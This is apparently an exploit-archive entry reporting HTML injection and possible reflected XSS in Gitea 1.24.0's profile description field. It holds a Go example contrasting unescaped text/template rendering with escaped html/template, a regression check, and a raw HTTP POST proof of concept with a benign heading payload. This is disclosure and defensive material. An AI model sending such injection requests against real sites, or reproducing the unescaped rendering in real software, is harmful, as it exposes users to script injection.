## https://sploitus.com/exploit?id=PACKETSTORM:189980
# Exploit Title: Gitea 1.24.0 - HTML Injection
    # Date: 2025-03-09
    # Exploit Author: Mikail KOCADAĞ
    # Vendor Homepage: https://gitea.com
    # Software Link: https://dl.gitea.io/gitea/1.24.0/
    # Version: 1.24.0
    # Tested on: Windows 10, Linux Ubuntu 22.04
    # CVE : N/A
    
## Vulnerability Description:
In Gitea 1.24.0, the "description" parameter on the user settings page is vulnerable to HTML Injection and potentially Reflected XSS. The user-supplied HTML content is not properly sanitized, so it is rendered as markup and executed in the browser. When a user saves a profile description containing malicious HTML or JavaScript code, the payload executes, confirming the vulnerability.
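The root cause described above is a profile field being interpolated into the page without HTML escaping. The following Go program is an added example (not Gitea's code) that decodes a form body constructed to match the advisory's request, then renders the decoded description two ways: with `text/template`, which reproduces the failure mode, and with `html/template`, which applies context-aware escaping and is the fix a reviewer would expect. The `leaksMarkup` helper is a constructed regression check, the CSRF token is a placeholder, and the payload is the harmless `<h1>deneme</h1>` from the page.

```go
package main

import (
	"fmt"
	htmltemplate "html/template"
	"net/url"
	"strings"
	texttemplate "text/template"
)

// Constructed sample of the advisory's form body, joined onto one line and
// with the CSRF token replaced by a placeholder value.
const sampleBody = "_csrf=CSRF_TOKEN_PLACEHOLDER&full_name=Abuzettin" +
	"&description=%3Ch1%3Edeneme%3C%2Fh1%3E&website=&location=&visibility=0&keep_email_private=on"

// Template shared by both renderers; the only difference is which package
// parses and executes it.
const profileTmpl = `<p class="description">{{.}}</p>`

// parseDescription decodes the urlencoded body the way a form handler would
// and returns the description field exactly as the server receives it.
func parseDescription(body string) (string, error) {
	values, err := url.ParseQuery(body)
	if err != nil {
		return "", err
	}
	return values.Get("description"), nil
}

// renderUnsafe reproduces the failure mode: text/template performs no HTML
// escaping, so tags in the description are emitted as live markup.
func renderUnsafe(desc string) string {
	var sb strings.Builder
	tmpl := texttemplate.Must(texttemplate.New("profile").Parse(profileTmpl))
	if err := tmpl.Execute(&sb, desc); err != nil {
		panic(err)
	}
	return sb.String()
}

// renderSafe is the hardened form: html/template escapes the value according
// to its HTML context, so the same description is displayed as literal text.
func renderSafe(desc string) string {
	var sb strings.Builder
	tmpl := htmltemplate.Must(htmltemplate.New("profile").Parse(profileTmpl))
	if err := tmpl.Execute(&sb, desc); err != nil {
		panic(err)
	}
	return sb.String()
}

// leaksMarkup is a regression check for a test suite: between the opening
// wrapper tag and the closing </p>, no raw '<' or '>' from user input may
// survive. It returns true when unescaped markup is present.
func leaksMarkup(rendered string) bool {
	start := strings.Index(rendered, ">") + 1
	end := strings.LastIndex(rendered, "</p>")
	if end < start {
		return true // wrapper not found; treat as unsafe
	}
	return strings.ContainsAny(rendered[start:end], "<>")
}

func main() {
	desc, err := parseDescription(sampleBody)
	if err != nil {
		panic(err)
	}
	fmt.Println("decoded description:", desc)
	fmt.Println("unsafe:", renderUnsafe(desc), "leaks markup:", leaksMarkup(renderUnsafe(desc)))
	fmt.Println("safe:  ", renderSafe(desc), "leaks markup:", leaksMarkup(renderSafe(desc)))
}
```

The same `leaksMarkup` style of assertion can be added to a handler test for every free-text profile field (description, full name, location, website), which is how this class of regression is normally caught before release.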
    
## Exploit PoC:
PoC screenshots:
- https://lh7-rt.googleusercontent.com/docsz/AD_4nXeh7FQb3EdM3-fPqRLqZ4Oh5JlVQdHjhBHEtPL5U9mEtTeWwiMdfx1SpyYC-Kg7EiWCy-Mpay8ZKz6WDw5hCYLrbCrAN2Dlg5xAnNIMuL9ui8ZNjH9GzD_rwdtjbGRkyoTP-uAd?key=pDzgPVQKg3NL0T6shAZ0U6Xz
- https://lh7-rt.googleusercontent.com/docsz/AD_4nXc-OZUDyqxfXQV92GwjmahRYFv7BzYhJ5lG2F6slXNyRVRcgyB2yNbK_NMkFkWbU6IggK4xOkUDP5aukMiEjFS18zIc3DDUR7M0wivQMF2aWRt91yx_ayb7AB556Uot1LVUaa1z8w?key=pDzgPVQKg3NL0T6shAZ0U6Xz
    
## Payload: `<h1>deneme</h1>`
### 1. Request:
```http
POST /user/settings HTTP/2
    Host: demo.gitea.com
    Cookie: _gid=GA1.2.1249205656.1740139988; _ga=GA1.2.291185928.1740139987; i_like_gitea=d9da795e317a0ced; lang=tr-TR; _ga_WBKVZF2YXD=GS1.1.1740139987.1.1.1740140041.6.0.0; _csrf=f9ITrnNQIzvSX-yvHX64qhoc_8w6MTc0MDE0MDY0MDQ2MTE0MDgyMQ
    Content-Length: 312
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Accept-Language: tr-TR,tr;q=0.9
    Origin: null
    Content-Type: application/x-www-form-urlencoded
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Priority: u=0, i
    
    _csrf=f9ITrnNQIzvSX-yvHX64qhoc_8w6MTc0MDE0MDY0MDQ2MTE0MDgyMQ
    &full_name=Abuzettin
    &description=%3Ch1%3Edeneme%3C%2Fh1%3E
    &website=
    &location=
    &visibility=0
&keep_email_private=on
```